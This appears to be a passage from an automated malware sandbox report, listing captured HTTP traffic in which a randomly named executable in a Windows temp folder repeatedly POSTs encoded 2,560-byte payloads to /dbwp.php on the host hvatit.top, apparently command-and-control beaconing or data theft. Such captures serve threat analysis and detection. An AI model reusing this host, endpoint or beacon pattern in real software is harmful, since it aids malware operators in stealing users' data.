                                                        Aug 31, 2024 09:33:57.631164074 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:57.989876032 CEST2560OUTData Raw: 5a 59 5c 56 5a 5c 50 57 5d 5f 54 57 54 5e 5b 5c 5a 56 59 53 52 52 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZY\VZ\PW]_TWT^[\ZVYSRRT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&!2<:<W"=+97+($*0'($.:U+++X?<.?!]'/Z,=
                                                        Aug 31, 2024 09:33:58.314579964 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:58.447578907 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        132192.168.2.44987080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:58.572729111 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:58.927396059 CEST2560OUTData Raw: 5f 5e 5c 53 5a 5c 55 50 5d 5f 54 57 54 5e 5b 53 5a 53 59 5b 52 52 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _^\SZ\UP]_TWT^[SZSY[RRT_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3!:B=* 6.+-/("+ V$9<&%/3-2T(???./!]'/Z,=
                                                        Aug 31, 2024 09:33:59.264924049 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:59.397600889 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        133192.168.2.44987180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:59.526457071 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:59.880693913 CEST2560OUTData Raw: 5f 5f 59 56 5a 55 55 50 5d 5f 54 57 54 5e 5b 53 5a 51 59 5a 52 51 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __YVZUUP]_TWT^[SZQYZRQT_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3")+_(U#>^-,3_4;4U0$&$'[!(#\=?4,?!]'/Z,=
                                                        Aug 31, 2024 09:34:00.196419001 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:00.327964067 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        134192.168.2.44987280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:00.474947929 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        135192.168.2.44987380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:00.787112951 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:01.146267891 CEST1436OUTData Raw: 5a 54 59 56 5a 5f 50 5d 5d 5f 54 57 54 5f 5b 5c 5a 57 59 5c 52 50 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTYVZ_P]]_TWT_[\ZWY\RPTSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.&2&B<;"(^.#($U$* V$%?_&>&U?;(<+8?!]'/Z,
                                                        Aug 31, 2024 09:34:01.457894087 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:01.661720037 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 57 24 16 3a 50 20 5d 22 10 28 3c 3d 55 27 1e 06 01 2c 31 2a 12 29 29 19 13 29 14 30 54 33 5b 24 5f 27 28 26 55 25 2c 3b 0e 27 1e 21 5b 07 10 21 01 24 3d 23 12 2d 2c 29 02 27 33 35 5a 34 21 2a 5e 3d 3d 25 58 20 38 36 05 24 28 3d 09 2e 3a 35 08 3c 3d 2c 00 29 3b 27 06 32 02 2b 50 00 12 26 14 32 3c 20 54 35 3d 2a 59 21 5e 2b 57 27 25 0e 03 37 38 2b 00 3c 06 21 52 25 2f 21 09 23 20 39 1c 25 21 3e 5b 3c 2d 30 09 2b 3c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #W$:P ]"(<=U',1*)))0T3[$_'(&U%,;'![!$=#-,)'35Z4!*^==%X 86$(=.:5<=,);'2+P&2< T5=*Y!^+W'%78+<!R%/!# 9%!>[<-0+<&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        136192.168.2.44987480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:00.923700094 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:01.274279118 CEST2560OUTData Raw: 5f 5d 5c 55 5f 5d 55 56 5d 5f 54 57 54 5d 5b 56 5a 5c 59 5a 52 56 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _]\U_]UV]_TWT][VZ\YZRVT^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.['22B+'5>[:Z$#70\$U&5&>9?;'=,',/!]'/Z,1
                                                        Aug 31, 2024 09:34:01.612230062 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:01.806708097 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        137192.168.2.44987580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:01.929958105 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:34:02.286755085 CEST2560OUTData Raw: 5a 55 59 52 5f 5a 50 53 5d 5f 54 57 54 5f 5b 54 5a 55 59 59 52 52 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZUYR_ZPS]_TWT_[TZUYYRRT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.'1"@(S"=49'X#4&)4$#X$-T++ +<8?!]'/Z,
                                                        Aug 31, 2024 09:34:02.614525080 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:02.747653008 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        138192.168.2.44987680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:02.886378050 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:03.240061045 CEST2560OUTData Raw: 5a 58 59 5f 5f 5f 50 57 5d 5f 54 57 54 5c 5b 54 5a 5d 59 5f 52 55 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZXY___PW]_TWT\[TZ]Y_RUT_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Y05?$U6>$-37+S39$P0C#Y&-(3]+Z;V.?!]'/Z,5
                                                        Aug 31, 2024 09:34:03.560643911 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:03.693799019 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        139192.168.2.44987780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:03.946594954 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:04.302395105 CEST2560OUTData Raw: 5f 5a 5c 52 5a 5f 55 52 5d 5f 54 57 54 59 5b 51 5a 56 59 59 52 54 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _Z\RZ_UR]_TWTY[QZVYYRTTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3"@+4V" Z.,#;#0$;'.&V(+0=??;!]'/Z,!
                                                        Aug 31, 2024 09:34:04.610225916 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:04.739881992 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        140192.168.2.44987880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:04.870266914 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:05.226283073 CEST2560OUTData Raw: 5a 5c 5c 54 5f 59 50 57 5d 5f 54 57 54 51 5b 5d 5a 5c 59 58 52 56 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\\T_YPW]_TWTQ[]Z\YXRVT[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Y02*E?_$T!=(: #'\$'3=.U+?]? 8!]'/Z,
                                                        Aug 31, 2024 09:34:05.541541100 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:05.736587048 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        141192.168.2.44987980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:05.876082897 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:06.224380016 CEST2560OUTData Raw: 5f 5d 59 55 5a 5f 50 54 5d 5f 54 57 54 59 5b 57 5a 56 59 52 52 51 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _]YUZ_PT]_TWTY[WZVYRRQTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'!(:+6>.<#_#(7&9#&6'_0=1<;+4/!]'/Z,!
                                                        Aug 31, 2024 09:34:06.558588028 CEST25INHTTP/1.1 100 Continue


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        142192.168.2.44988080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:06.684086084 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:07.038311958 CEST1436OUTData Raw: 5a 5a 5c 52 5a 5d 50 53 5d 5f 54 57 54 5c 5b 5d 5a 53 59 5d 52 51 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZZ\RZ]PS]_TWT\[]ZSY]RQT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-$"A< 6 .+_";$U3$P'64&-1(+0(<.?!]'/Z,5
                                                        Aug 31, 2024 09:34:07.353207111 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:07.551707029 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 20 0f 27 3b 26 54 20 05 3e 10 28 2c 3e 09 26 30 3f 12 2f 0f 35 07 29 39 28 07 3e 03 24 55 27 5b 38 11 33 01 39 09 25 3f 37 0a 25 34 21 5b 07 10 22 5b 26 00 2b 5a 3b 3f 29 02 26 56 2d 12 37 31 36 5a 3d 03 29 5c 22 05 0b 5d 27 06 2a 1a 2e 39 31 0c 2b 3d 28 00 3e 38 24 11 25 12 2b 50 00 12 25 0a 25 3f 15 0a 36 07 21 06 35 16 16 0e 27 36 24 07 23 05 2f 03 3f 06 07 56 27 02 29 08 34 20 39 5b 26 22 21 06 28 00 3f 15 29 3c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: ';&T >(,>&0?/5)9(>$U'[839%?7%4!["[&+Z;?)&V-716Z=)\"]'*.91+=(>8$%+P%%?6!5'6$#/?V')4 9[&"!(?)<&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        143192.168.2.44988180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:06.802707911 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:07.162280083 CEST2560OUTData Raw: 5a 5c 59 54 5a 5e 50 51 5d 5f 54 57 54 50 5b 51 5a 56 59 5f 52 5d 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\YTZ^PQ]_TWTP[QZVY_R]T\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.[&"-?)V5>'-?84<$8U'&7_3>>(;+4;?!]'/Z,
                                                        Aug 31, 2024 09:34:07.471966028 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:07.600575924 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        144192.168.2.44988280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:07.725974083 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:34:08.083642006 CEST2560OUTData Raw: 5a 58 59 5f 5f 59 55 50 5d 5f 54 57 54 5b 5b 50 5a 5d 59 5e 52 5c 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZXY__YUP]_TWT[[PZ]Y^R\T^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.[$!=);"',<[7( V0''5['W(+$<#/!]'/Z,)
                                                        Aug 31, 2024 09:34:08.394990921 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:08.529712915 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        145192.168.2.44988380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:08.653000116 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:09.006283045 CEST2560OUTData Raw: 5a 5b 5c 51 5f 5f 50 52 5d 5f 54 57 54 5b 5b 5c 5a 5d 59 5f 52 53 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z[\Q__PR]_TWT[[\Z]Y_RST]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Y0W%<;#-'9/+Y 0'*$C'[0[9<,<4./!]'/Z,)
                                                        Aug 31, 2024 09:34:09.323337078 CEST25INHTTP/1.1 100 Continue
